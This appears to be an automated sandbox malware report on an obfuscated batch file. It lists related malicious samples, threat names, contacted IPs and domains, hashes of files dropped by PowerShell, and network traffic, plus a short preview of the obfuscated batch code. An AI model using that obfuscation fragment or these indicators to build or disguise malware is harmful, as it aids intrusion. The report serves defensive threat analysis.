                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                gitlab.comkjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                www-env.dropbox-dns.comkjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                edge-block-www-env.dropbox-dns.comkjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                bg.microsoft.map.fastly.netRECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                CLOUDFLARENETUSkjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                • 1.8.182.26
                                                                                                                                                                                                                StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                • 104.21.78.102
                                                                                                                                                                                                                DROPBOXUSkjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.4.18
                                                                                                                                                                                                                xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.15
                                                                                                                                                                                                                RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.21.1
                                                                                                                                                                                                                hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.65.18
                                                                                                                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ekjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                g1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                • 162.125.69.18
                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):68976514
                                                                                                                                                                                                                Entropy (8bit):7.994115527703699
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1572864:T2Ycra0WKQw0Fpc9vBCUNyWpNBTvL3NauYsHS:6Da03R/1U8BTvL3NtYAS
                                                                                                                                                                                                                MD5:F3FBC911B9BD5A7E55B99616E7017A50
                                                                                                                                                                                                                SHA1:20CB5C982E164E0008E41D19A27A5A09837DFA6D
                                                                                                                                                                                                                SHA-256:9A8B28B65CA9C8303385B84390EF6202A508542E7E358C465244529A47E6F1AC
                                                                                                                                                                                                                SHA-512:558F6F1AB50ED612C9F50C526B4040EFE7DC7D24E08C795CDF4F21C14EA05621DB826638B17A187848B99406307D8CAB2C935CDB9AE18E80C3F725F6CD843C49
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:PK........\.FX....G'..........LICENSE.txt.\]s..}G...J/....L2.Im...m.-y))..KI...Eh.........Yv..W.*U.D..F..}N.t/.W.x2.?....\.|<..|.......<v.+V*..D.y..B,..x..\$y.....O5...e)...'.....'...r.*dv....B....EV.p.Q.S.s-._..F....v...[.d..g(.=O.l.=.j$\...Z.\-.+.tW&w..4..z...[}r.Sf..a....\fs.IR..p-.y...........Bh.N...+.S..B*....+TF.h.(...mWx..JP`%5........8...7*OP._..cC....B.A.6Q&..W.A...0>d.,.A.t...>.J}.10VLW|.Q.w2.....R..R.h.L.{.Co.iLj.zyL.e.Mr..v........X.ot.+...a..a2y!.5_.{.P.;....9..P8.5.6....d...L..8..j&r.......M|......,`H}.N.......31'..R...Mw0.nS2.[...Uf.3EG...2....P.@.w.7z...V..R,..x...M...NpK...H......1.K...!.........e..g..%..6.!...x8..5+b..W..w|-..3..hJ{ij.p.9...c..|..Q...L.u..q.b.n0.K...c0.....|..].......%.....U...{.?i.s.R/o.O.c60.Y*>..E....Tma..I....r._T....@9.bs...@...._......6...vnZ.h...U.....{..9....0.......CG....|.0X]......k...7%`;l...C.8..].3'.^....^.L..g..^.ZV.mc.Wm...x..=................(.t_...t....'.Y..y..A.6~.......(8'3...{.dj{
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9434
                                                                                                                                                                                                                Entropy (8bit):4.928515784730612
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):14
                                                                                                                                                                                                                Entropy (8bit):3.521640636343319
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Mrv:gv
                                                                                                                                                                                                                MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                                SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                                SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                                SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:ECHO is off...
                                                                                                                                                                                                                Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):36
                                                                                                                                                                                                                Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:FIND: Parameter format not correct..
                                                                                                                                                                                                                File type:Unicode text, UTF-16, little-endian text, with very long lines (16582), with no line terminators
                                                                                                                                                                                                                Entropy (8bit):5.556527772021926
                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                                                • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                                                File name:jhsdgfjkh236.bat
                                                                                                                                                                                                                File size:33'166 bytes
                                                                                                                                                                                                                MD5:24679294caaa93cba79e8a89fe3b9ad5
                                                                                                                                                                                                                SHA1:cd76ad906bdb6df31acefa942a30a2cffabda9f1
                                                                                                                                                                                                                SHA256:e5138ceb9edb0277779b64cfea8fc531c4dd7641199acb151d031fb0c8ae0d12
                                                                                                                                                                                                                SHA512:75cae8dbde14a73b0eb0c3437eeda6b9c9899aaa4178a4fa63176de2343fdec3055a6af41a7ee08f0459ad49f139261298fae3e0f519fe278be26dd30abf454d
                                                                                                                                                                                                                SSDEEP:384:ecTMI7EzfLajYUptE+ZznBn9yBSoEIO19nNT33AXGfkSyoVO:3TMI7EzDa8U7E+Zznvyco+19ZnXf6
                                                                                                                                                                                                                TLSH:43E2B54917CA56EF60AFD76196CA2C5398E668FE6837D94AB73C36DC4F7002C8416833
                                                                                                                                                                                                                File Content Preview:....>nul 2>&1 &cls.@@e^ch%..................^%%............^......%%..................^%o o^f%...^...............%%......^............%f&fo%................^%^%.......^.........%R /l %%i IN (1 1 1)do (fo%................^%^%.......^.........%R /l %%i IN (
                                                                                                                                                                                                                Icon Hash:9686878b929a9886
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.479368925 CET49708443192.168.2.10162.125.69.18
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.479425907 CET44349708162.125.69.18192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.479487896 CET49708443192.168.2.10162.125.69.18
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.506058931 CET49708443192.168.2.10162.125.69.18
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.506077051 CET44349708162.125.69.18192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:11.931200027 CET44349708162.125.69.18192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:11.931284904 CET49708443192.168.2.10162.125.69.18
                                                                                                                                                                                                                Dec 19, 2024 14:14:11.941433907 CET49708443192.168.2.10162.125.69.18
                                                                                                                                                                                                                Dec 19, 2024 14:14:11.941450119 CET44349708162.125.69.18192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:11.941677094 CET44349708162.125.69.18192.168.2.10
